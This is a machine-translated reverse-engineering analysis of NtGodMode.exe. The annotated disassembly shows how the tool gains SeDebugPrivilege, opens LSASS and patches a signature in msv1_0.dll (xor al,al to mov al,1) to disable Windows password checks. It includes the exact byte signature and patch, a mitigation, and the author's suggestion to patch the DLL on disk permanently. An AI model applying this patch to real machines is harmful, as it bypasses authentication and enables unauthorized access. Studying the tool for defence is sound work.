Analysis of what NtGodMode.exe did-vulnerability research
Last Update:2017-01-18
Source: Internet
Author: User
by http://tmdnet.nothave.com
NtGodModex.exe http://www.xfocus.net/tools/200804/1272.html
NtGodMode.exe 9.00 KB (9,216 bytes) UPX shell, directly with ollydbg shelling, the process slightly
Ntgodmode~.exe mb (123,392 bytes) view with PE tool, Delphi write
00403220 > PUSH EBP
00403221 8BEC MOV Ebp,esp
00403223 B9 0d000000 MOV ecx,0d
00403228 6A PUSH 0
0040322A 6A PUSH 0
0040322C DEC ECX
0040322D ^ F9 jnz short ntgodmod.00403228
0040322F I PUSH ECX
00403230 PUSH EBX
00403231 PUSH ESI
00403232 PUSH EDI
00403233 A1 9c404000 MOV eax,dword PTR ds:[40409c]
00403238 C600 MOV BYTE PTR ds:[eax],1
0040323B B8 C0314000 MOV eax,ntgodmod.004031c0
00403240 E8 13EEFFFF Call ntgodmod.00402058//get handle of its own process (base address)
00403245 BB 60574000 MOV ebx,ntgodmod.00405760
0040324A 33c0 XOR Eax,eax
0040324C PUSH EBP
0040324D 80384000 PUSH ntgodmod.00403880
00403252 64:ff30 PUSH DWORD PTR Fs:[eax]
00403255 64:8920 MOV DWORD PTR fs:[eax],esp
00403258 E8 1bf2ffff Call ntgodmod.00402478
0040325D DEC EAX
0040325E 7D Jge Short ntgodmod.004032c1//->>004032c1
00403260 E8 4FFEFFFF Call NTGODMOD.004030B4
00403265 98384000 PUSH ntgodmod.00403898; ASCII "Usage:"
0040326A 8d55 E4 LEA edx,dword PTR ss:[ebp-1c]
0040326D 33c0 XOR Eax,eax
0040326F E8 f8f0ffff Call ntgodmod.0040236c
00403274 8b45 E4 MOV eax,dword PTR ss:[ebp-1c]
00403277 8d55 E8 LEA edx,dword PTR ss:[ebp-18]
0040327A E8 11f4ffff Call ntgodmod.00402690
0040327F FF75 E8 PUSH DWORD PTR ss:[ebp-18]
00403282 A8384000 PUSH ntgodmod.004038a8; ASCII "on| Off "
00403287 8d45 EC LEA eax,dword PTR ss:[ebp-14]
0040328A BA 03000000 MOV edx,3
0040328F E8 70e9ffff Call NTGODMOD.00401C04
///////////////////////////////////////////////////////////////////////////////////////////////////
004032C1 A1 8c404000 MOV eax,dword PTR ds:[40408c]
004032C6 E8 61EAFFFF Call ntgodmod.00401d2c
004032CB PUSH EAX//msv1_0.dll
004032CC E8 bfeeffff Call <jmp.&kernel32. Loadlibrarya>//loadlibrary ("Msv1_0.dll")
004032d1 A3 4c574000 MOV DWORD PTR ds:[40574c],eax//Save Msv1_0.dll Base site
004032D6 833D 4c574000 0>cmp DWORD PTR ds:[40574c],0
004032DD 0f84 82050000 JE ntgodmod.00403865
004032E3 33c0 XOR Eax,eax
004032E5 A3 50574000 MOV DWORD PTR ds:[405750],eax
004032EA A1 4c574000 MOV eax,dword PTR ds:[40574c]
004032EF 8903 MOV DWORD PTR ds:[ebx],eax
004032F1 33c0 XOR Eax,eax
004032F3 PUSH EBP
004032F4 50334000 PUSH ntgodmod.00403350
004032f9 64:ff30 PUSH DWORD PTR Fs:[eax]
004032FC 64:8920 MOV DWORD PTR fs:[eax],esp
004032FF 8b03 MOV eax,dword PTR ds:[ebx]//msv1_0.dll base site
00403301 8038 8B CMP BYTE PTR ds:[eax],8b
00403304 1C jnz Short ntgodmod.00403322
00403306 8b03 MOV eax,dword PTR DS:[EBX]
00403308 Inc. EAX
00403309 8038 4D CMP BYTE PTR ds:[eax],4d
0040330C JNZ Short ntgodmod.00403322
0040330E 8b03 MOV eax,dword PTR DS:[EBX]
00403310 83c0 ADD eax,2
00403313 8038 0C CMP BYTE PTR ds:[eax],0c
00403316 0A jnz Short ntgodmod.00403322
00403318 8b03 MOV eax,dword PTR DS:[EBX]
0040331A 83c0 ADD eax,3
0040331D 8038 CMP BYTE PTR ds:[eax],49//Find 8B 4D 0C 49 in Msv1_0.dll space, this feature value
00403320 JE Short ntgodmod.00403326//if found then continue to find C0 in the back space
00403322 FF03 INC DWORD PTR DS:[EBX]
00403324 ^ EB D9 JMP Short ntgodmod.004032ff
00403326 8b03 MOV eax,dword PTR DS:[EBX]
00403328 8038 CMP BYTE PTR ds:[eax],32
0040332B JNZ Short ntgodmod.0040333e
0040332D 8b03 MOV eax,dword PTR DS:[EBX]
0040332F INC EAX
00403330 8038 C0 CMP BYTE PTR ds:[eax],0c0
00403333 JNZ Short ntgodmod.0040333e
00403335 8b03 MOV eax,dword PTR DS:[EBX]
00403337 A3 50574000 MOV DWORD PTR ds:[405750],eax//save to find address [405750]
0040333C EB-JMP short ntgodmod.00403342
0040333E FF03 INC DWORD PTR DS:[EBX]//pointer plus 1
00403340 ^ EB E4 JMP Short ntgodmod.00403326
00403342 33c0 XOR Eax,eax
00403344 5A POP EDX
00403345 POP ECX
00403346 POP ECX
00403347 64:8910 MOV DWORD PTR Fs:[eax],edx
0040334A 57334000 PUSH ntgodmod.00403357
0040334F C3 RETN
00403357 A1 50574000 MOV eax,dword PTR ds:[405750]
0040335C 2b05 4c574000 SUB eax,dword PTR ds:[40574c]//address =msv1_0.dll base address found above, offset by eigenvalues
00403362 A3 50574000 MOV DWORD PTR ds:[405750],eax//offset->[405750]
00403367 A1 4c574000 MOV eax,dword PTR ds:[40574c]
0040336C PUSH EAX
0040336D E8 e6edffff Call <jmp.&kernel32. Freelibrary>
00403372 C605 9c584000 0>mov BYTE PTR ds:[40589c],0
00403379 C605 91584000 0>mov BYTE PTR ds:[405891],0
00403380 C605 9d584000 0>mov BYTE PTR ds:[40589d],0
00403387 E8 28FDFFFF Call NTGODMOD.004030B4//Display author information
0040338C 8d55 DC LEA edx,dword PTR ss:[ebp-24]
0040338F B8 02000000 MOV eax,2
00403394 E8 d3efffff Call ntgodmod.0040236c
.
.
.
/////////////////////////////////////////////////////////////////////////////////////////////
Promote self permissions for debug permissions
Http://tmdnet.nothave.com/tmp/NtGodMode.txt
00402f1c PUSH EBX; ntgodmod.00405760
00402f1d 83c4 E8 ADD esp,-18
00402f20 33DB XOR EBX,EBX
00402f22 PUSH ESP
00402f23 6A PUSH 28
00402f25 E8 3ef2ffff Call <jmp.&kernel32. Getcurrentprocess>
00402F2A PUSH EAX
00402F2B E8 f8f1ffff Call <jmp.&advapi32. Openprocesstoken>
00402F30 8d4424 0C LEA eax,dword PTR Ss:[esp+c]
00402f34 PUSH EAX
00402f35 7c2f4000 PUSH ntgodmod.00402f7c; ASCII "SeDebugPrivilege"
00402F3A 6A PUSH 0
00402F3C E8 dff1ffff Call <jmp.&advapi32. Lookupprivilegevaluea>
00402f41 85c0 TEST Eax,eax
00402f43 JE Short ntgodmod.00402f75
00402f45 C74424 01000>mov DWORD PTR ss:[esp+8],1
00402F4D C74424 02000>mov DWORD PTR ss:[esp+14],2
00402f55 8d4424 LEA eax,dword PTR ss:[esp+4]
00402f59 PUSH EAX
00402F5A 6A PUSH 0
00402F5C 6A PUSH 10
00402f5e 8d4424 LEA eax,dword PTR ss:[esp+14]
00402f62 PUSH EAX
00402f63 6A PUSH 0
00402f65 8b4424 MOV eax,dword PTR ss:[esp+14]
00402f69 PUSH EAX
00402F6A E8 a9f1ffff Call <jmp.&advapi32. Adjusttokenprivileges>
00402F6F 83f8 CMP eax,1
00402f72 1BDB SBB EBX,EBX
00402f74/INC EBX
00402f75 8BC3 MOV EAX,EBX
00402f77 83c4 ADD esp,18
00402f7a 5B POP EBX
00402f7b C3 RETN
///////////////////////////////////////////////////////////////////////////////////////////////
.
. This section gets the PID (LSASS) by the process name. EXE) Too long ...
.
///////////////////////////////////////////////////////////////////////////////////////////////
Http://tmdnet.nothave.com/tmp/NtGodMode.txt
0040358A PUSH EAX
0040358B 6A PUSH 0
0040358D ff0f1f00 PUSH 1f0fff
00403592 E8 01ECFFFF Call <jmp.&kernel32. openprocess>//Open%systemroot%\system32\lsass. EXE process
00403597 8bf0 MOV Esi,eax
00403599 85f6 TEST Esi,esi
0040359B 1E jnz Short NTGODMOD.004035BB
0040359D A1 98404000 MOV eax,dword PTR ds:[404098]
004035A2 BA 10394000 MOV edx,ntgodmod.00403910; ASCII "Sorry. I can ' t do more. "
004035a7 E8 78e8ffff Call Ntgodmod.00401e24
004035AC E8 6fe1ffff Call ntgodmod.00401720
004035B1 E8 3EDCFFFF Call Ntgodmod.004011f4
004035b6 E9 AA020000 JMP ntgodmod.00403865
004035BB B8 A0584000 MOV eax,ntgodmod.004058a0
004035c0 BA 00000100 MOV edx,10000
004035C5 E8 0EECFFFF Call Ntgodmod.004021d8
004035CA A0584100 PUSH ntgodmod.004158a0
004035CF BA A0584000 MOV edx,ntgodmod.004058a0
004035d4 B9 00000100 MOV ecx,10000
004035D9 8bc6 MOV Eax,esi
004035DB E8 a4f8ffff Call ntgodmod.00402e84
004035E0 8b3d A0584100 MOV edi,dword PTR ds:[4158a0]
004035E6 4F DEC EDI
004035E7 85FF TEST Edi,edi
004035E9 0f82 D6000000 JB ntgodmod.004036c5
004035EF INC EDI
004035f0 C705 58574000 0>mov DWORD PTR ds:[405758],0
004035FA BB A0584000 MOV ebx,ntgodmod.004058a0
004035FF 833B CMP DWORD PTR ds:[ebx],0
00403602 0f84 BD000000 JE ntgodmod.004036c5
00403608 C705 A4584100 C>mov DWORD PTR ds:[4158a4],0c8
00403612 A1 A4584100 MOV eax,dword PTR ds:[4158a4]
00403617 PUSH EAX
00403618 B9 A8584100 MOV ecx,ntgodmod.004158a8
0040361D 8b13 MOV edx,dword PTR DS:[EBX]
0040361F 8bc6 MOV Eax,esi
00403621 E8 8ef8ffff Call NTGODMOD.00402EB4
///////////////////////////////////////////////////////////////////////////////////////////////////
Http://tmdnet.nothave.com/tmp/NtGodMode.txt
00403732 5c574000 PUSH ntgodmod.0040575c
00403737 6A PUSH 40
00403739 6A PUSH 2
0040373B A1 50574000 MOV eax,dword PTR ds:[405750]
00403740 PUSH EAX
00403741 PUSH ESI
00403742 E8 79EAFFFF Call <jmp.&kernel32. Virtualprotectex>
00403747 98584000 PUSH ntgodmod.00405898
0040374C 6A PUSH 2
0040374E 90404000 PUSH ntgodmod.00404090
00403753 A1 50574000 MOV eax,dword PTR ds:[405750]
00403758 PUSH EAX
00403759 PUSH ESI
0040375A E8 69EAFFFF Call <jmp.&kernel32. Writeprocessmemory>//32c0 xor Al,al modified to B001 mov al,1
0040375F B0 MOV al,4
00403761 E8 deefffff Call ntgodmod.00402744
00403766 A1 98404000 MOV eax,dword PTR ds:[404098]
0040376B BA 70394000 MOV edx,ntgodmod.00403970; ASCII "Open God mode!"
00403770 E8 afe6ffff Call Ntgodmod.00401e24
00403775 E8 a6dfffff Call ntgodmod.00401720
0040377A E8 75DAFFFF Call Ntgodmod.004011f4
0040377F 33c0 XOR Eax,eax
00403781 E8 beefffff Call ntgodmod.00402744
00403786 EB JMP Short NTGODMOD.004037DC
00403788 5c574000 PUSH ntgodmod.0040575c
0040378D 6A PUSH 40
0040378F 6A PUSH 2
00403791 A1 50574000 MOV eax,dword PTR ds:[405750]
00403796 PUSH EAX
00403797 PUSH ESI
00403798 E8 23EAFFFF Call <jmp.&kernel32. Virtualprotectex>
0040379D 98584000 PUSH ntgodmod.00405898
004037A2 6A PUSH 2
004037A4 94404000 PUSH ntgodmod.00404094
004037a9 A1 50574000 MOV eax,dword PTR ds:[405750]
004037AE PUSH EAX
004037AF PUSH ESI
004037b0 E8 13EAFFFF Call <jmp.&kernel32. Writeprocessmemory>
004037b5 B0 Modified MOV al,7
004037b7 E8 88EFFFFF Call ntgodmod.00402744
004037BC A1 98404000 MOV eax,dword PTR ds:[404098]
004037C1 BA 88394000 MOV edx,ntgodmod.00403988; ASCII "Close God mode!"
004037C6 E8 59e6ffff Call Ntgodmod.00401e24
004037CB E8 50DFFFFF Call ntgodmod.00401720
004037d0 E8 1FDAFFFF Call Ntgodmod.004011f4
004037d5 33c0 XOR Eax,eax
004037d7 E8 68EFFFFF Call ntgodmod.00402744
004037DC 6A PUSH 0
004037DE 6A PUSH 0
004037E0 PUSH ESI
004037E1 E8 6ae9ffff Call <jmp.&kernel32. Flushinstructioncache>
Summary
NtGodMode.exe is by opening the LSASS.EXE process Msv1_0.dll module space and then searching for the eigenvalues 8B 4D 0C 49 after the 1th C0
This 32c0 is an XOR Al,al, modified to B001 corresponding to the Mov al,1
Why is MOV al,1, then no password? Interested students can install a virtual machine, adjust the LSASS.EXE
This program on my own machine Win2K SP4, does not work, I followed, mainly search for which eigenvalue of the above it is not universal, modified the wrong place
XP SP2 XP SP3 all work.
Also want to let oneself machine immunity this thing, actually very simple control Panel-> management tools-> Local Security Policy-> Local policy-> User Rights Assignment-> debugger
There is an admin user, deleted later, because the program to promote their own code, very old, very poor, very weak, will be ineffective
In fact, this thing to use, by way of programming, turn off the system File Protection, directly to msv1_0.dll this PE file, so that the machine does not use the password, and then if a lot of machine access to share files is also convenient, the computer should be people-oriented.
Finally said a Delphi wrote the thing is not good, the rubbish too many ~!!
Http://tmdnet.nothave.com/tmp/NtGodMode.txt